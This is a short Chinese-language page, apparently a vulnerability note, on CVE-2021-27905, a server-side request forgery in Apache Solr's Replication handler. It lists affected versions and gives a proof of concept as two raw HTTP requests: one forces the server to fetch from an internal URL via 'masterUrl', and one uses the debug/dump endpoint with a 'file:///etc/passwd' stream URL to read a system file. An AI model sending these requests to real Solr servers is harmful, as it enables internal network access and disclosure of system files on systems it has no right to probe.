CVE-2021-27905_Apache_Solr_Replication_handler_SSRF漏洞

# CVE-2021-27905 Apache Solr Replication handler SSRF漏洞
==影響版本==

Apache Solr 7.0.0 - 7.7.3 Apache Solr 8.0.0 - 8.8.1

==POC==

GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1
HOST:target
....
GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1
HOST:target
...
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容